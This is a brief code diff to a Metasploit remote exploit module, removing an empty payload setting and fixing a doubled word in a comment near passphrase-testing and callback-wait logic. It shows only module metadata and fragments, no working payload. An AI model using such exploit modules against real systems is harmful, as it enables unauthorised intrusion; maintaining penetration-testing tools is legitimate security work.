@@ -67,9 +67,6 @@ class MetasploitModule < Msf::Exploit::Remote
           [ 'v9.2.2 - v9.3.0-RC', { 'ReqEncrypt' => true, 'ReqSession' => true } ]
         ],
         'Stance' => Msf::Exploit::Stance::Aggressive,
-        'Payload' => {
-
-        },
         'Privileged' => false,
         'DisclosureDate' => '2017-07-20',
         'DefaultOptions' => { 'WfsDelay' => 5 },
@@ -304,7 +301,7 @@ class MetasploitModule < Msf::Exploit::Remote
           test_passphrases
 
           # If no working passphrase has been found,
-          # wait to allow the the chance for the last one to callback.
+          # wait to allow the chance for the last one to callback.
           if @passphrase.empty? && !@dry_run
             sleep(wfs_delay)
           end
